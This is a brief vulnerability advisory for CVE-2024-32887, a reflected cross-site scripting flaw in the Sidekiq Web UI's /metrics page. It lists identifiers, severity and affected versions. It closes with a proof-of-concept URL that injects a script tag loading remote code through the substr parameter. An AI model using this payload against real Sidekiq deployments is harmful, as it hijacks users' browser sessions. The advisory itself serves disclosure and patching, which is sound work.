Reflected XSS in Metrics Web Page
Published: April 26, 2024
SECURITY IDENTIFIERS
- CVE: CVE-2024-32887 (NVD)
- GHSA: GHSA-GHSA-q655-3pj8-9fxq
- Vendor Advisory: https://github.com/sidekiq/sidekiq/security/advisories/GHSA-q655-3pj8-9fxq
GEM
SEVERITY
CVSS v3.x: 5.5 (Medium)
UNAFFECTED VERSIONS
< 7.2.0
PATCHED VERSIONS
>= 7.2.4
DESCRIPTION
Reflected XSS in Sidekiq Web UI via the /metrics HTTP end-point and the
substr query param:
https://{host}/sidekiq/metrics?substr=foot%22%3E%3Cscript%20src=%22{payload}%22%20/%3E